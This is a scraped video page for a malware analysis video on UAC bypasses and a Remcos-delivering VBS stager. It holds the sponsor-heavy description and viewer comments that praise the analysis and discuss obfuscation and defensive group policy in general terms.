No video :(

Malware Analysis & Threat Intel: UAC Bypasses

Подписаться 1,8 млн

Просмотров 117 тыс.

50% 1

jh.live/anyrun-ti || ANYRUN has just released their latest Threat Intelligence feature set, and it is super cool to track and hunt for malware families or observed tradecraft -- try it out! jh.live/anyrun-ti
Learn Cybersecurity - Name Your Price Training with John Hammond: nameyourpricet...
📧JOIN MY NEWSLETTER ➡ jh.live/email
🙏SUPPORT THE CHANNEL ➡ jh.live/patreon
🤝 SPONSOR THE CHANNEL ➡ jh.live/sponsor
🌎FOLLOW ME EVERYWHERE ➡ jh.live/twitter ↔ jh.live/linkedin ↔ jh.live/discord ↔ jh.live/instagram ↔ jh.live/tiktok
💥 SEND ME MALWARE ➡ jh.live/malware
🔥RU-vid ALGORITHM ➡ Like, Comment, & Subscribe!

Опубликовано:

29 авг 2024

Ссылка:

Скачать:

Готовим ссылку...

Добавить в:

Мой плейлист

Посмотреть позже

Комментарии : 69

@IAmmlskOG 5 месяцев назад

dude you move through this file like butter

@nickadams2361 5 месяцев назад

he did it before, this is a planned demo. Normal stuff you should be able to do at work

@user-sx4zy5hn2f 4 месяца назад

@@nickadams2361😊😊😊😊😊😊😊😊😊

@IOwnThisHandle 3 месяца назад

It is rehearsed

@hedgehogform 5 месяцев назад

VSCode has a powershell formatter

@HachikoTanuki 5 месяцев назад

I feel like such a casual that I know none of the tools John is using, while VSCode is too casual for John to know it has a Powershell formatter 😭

@markcentral 5 месяцев назад

Thanks for the video. Is the anyrun segment part of a sponsored deal? If not, I would have preferred you continued to demonstrate how to deconstruct the malware locally. There's a lot of educational value and wisdom potential being lost by moving things to an online platform that requires a subscription vs local

@gabriell4815162342 5 месяцев назад

I love your videos, as a foreigner and because I don't speak native English, I feel very comfortable and can understand everything because of the calm and concise way you speak. In addition to practicing my English, I learn a lot about cyber security

@Alfred-Neuman 5 месяцев назад

I learned English by watching lot of RU-vid videos like this. If you are curious enough and/or determined, you'll be able to write some English poetry pretty soon. ;D

@severinghams 4 месяца назад

@@Alfred-Neuman I don't understand foreigners' fascination with English poetry. Why is poetry something that so many non-English speakers flock to when they learn English? Why not debate, or music, or popular speeches, or literature- why _specifically_ poetry? What is so special about poetry?

@Alfred-Neuman 4 месяца назад

@@severinghams How many languages do you speak outside of English?

@MadeAnAccountOnlyToReplyToThis 12 дней назад

@@severinghams Poetry is built around idiosyncrasies of the language it is written and spoken in. It is arguably the most advanced way of utilizing a language. You can generally translate a speech without issue and get the point across, but you can't translate a poem without losing the essence of the message. You should probably read more poetry.

@Carambolero 5 месяцев назад

Nice start, but next time if you want to promote a tool, just go to the point and state it in the Title. Tx.

@antifreeze44 5 месяцев назад

You're take on the Apex stuff was AWESOME, thanks John!

@valk9789 5 месяцев назад

Treat at the end~ love John's laugh😅❤

@PMM619 5 месяцев назад

hey fan from Morocco, all the love !!

@memeconnect4489 5 месяцев назад

a lot of danish words in that code

@7YBzzz4nbyte 5 месяцев назад

Seems to be fluff to obfuscate the code itself. Seems like Danish-inspired gobbledegook, words stacked without meaning, though a scanner would not know (at least not before AI). 😮

@Adkali 5 месяцев назад

Love the threat analysis using the dynamic analysis. Again, thanks john for another fun schooling video

@cypher2226 5 месяцев назад

I didn't know about that UAC bypass

@YuKonSama 4 месяца назад

I kind of like the sublime approach to clean the sample up but I also would be interested into automating stuff like this (guess R.E.M has tools for this). For example, deleting variables that are assigned but never used should be a pretty easy task.

@dipongkorroy6424 5 месяцев назад

Love from Bangladesh ❤

@user-lq3tv4nd8w 5 месяцев назад

Why did you bang ladesh tho, poor fella

@Duy1P3 5 месяцев назад

I'd really like to see your homelab setup and see how you run things and do your investigations and with what tools and stuff.

@Supstone8519 5 месяцев назад

Very insightful. Thank you for doing this video.

@k.g.c.karunathilaka9781 4 месяца назад

Thanks

@Streetrack 5 месяцев назад

I really like this one!!

@learnsomething564 5 месяцев назад

First one ooooo now i have millions in my account

@eikichi9050 5 месяцев назад

Hello Mr Hammond it is possible to defend against these type of attacks? Sorry for my english

@UnfiItered 5 месяцев назад

If your end users don't use/run vbs/batch/PS1 scripts. You can make a group policy to require UAC to run them or disable them completely.

@ShayBlez 5 месяцев назад

Never thought Id see Bonzi Buddy again.. XD

@allofabout7064 5 месяцев назад

I hope you discuss Qlin Ransomware, and how to overcome it (recovery)

@codytrout3257 5 месяцев назад

Pro tip- change the speed to slower if you cant keep up with the commands fully, yet, like me.

@johnvardy9559 4 месяца назад

I love y john

@user-yi4ef2gk1o 5 месяцев назад

NICE this is really menace :)

@capability-snob 5 месяцев назад

What was the intended use of this .ini file and the class named by the guid?

@JohnSmith-jc7dk 5 месяцев назад

why vbs is required to deploy remcos and not deploying remcos directly?

@UnfiItered 5 месяцев назад

Vbs was just a stager to build the powershell to run. Basically the hacker was trying to hide what they were doing behind a bunch of dead end code.

@chri-k 5 месяцев назад

The point is that anyone who finds the malware but doesn't know how to handle this (including antiviruses) will likely not try to, which hopefully buys some more time before it gets logged into a malware registry. Inflated file sizes also stop VirusTotal and some antiviruses from analysing the file

@carsonjamesiv2512 5 месяцев назад

NICE!😃

@psbharathkumarachari4005 5 месяцев назад

hi man fan from india

@carteldebellamy677 5 месяцев назад

Awesome video

@RandomytchannelGD 5 месяцев назад

@mdfourhadkhan1842 5 месяцев назад

❤❤❤❤❤❤

@Hacker_Solo 5 месяцев назад

Where can we obtain this sample for free

@XtremuZ 15 дней назад

malware bazaar

@frinkifail7063 5 месяцев назад

sure love assimilationist one hundred thirty nine

@runandwin5396 5 месяцев назад

Chapters please?

@SlipperyCarrot 5 месяцев назад

Whole lot of Danish word in that sample..

@liljeep3631 5 месяцев назад

You guys use uac?

@UnfiItered 5 месяцев назад

? Everyone in the AD world uses UAC. You don't want your end users in a lower privilege group policy to just download and run anything without UAC. You're opening yourself up to so many threat vector by doing that.

@liljeep3631 5 месяцев назад

@@UnfiItered vector these nuts

@UnfiItered 5 месяцев назад

@@liljeep3631 okay, obviously you're a troll.

@liljeep3631 5 месяцев назад

@@UnfiItered don’t need uac

@UnfiItered 4 месяца назад

@@nezu_cc other than stealing files via emails and accessing network, everything else should require UAC via group policy (cmd, pwsh, windows native file encryption tools, vbs, portable exe etc..). Even then, group policy should dictate which user have access to which network drive. Outlook is the only email client used. Attachment is disallowed unless sending to internal email.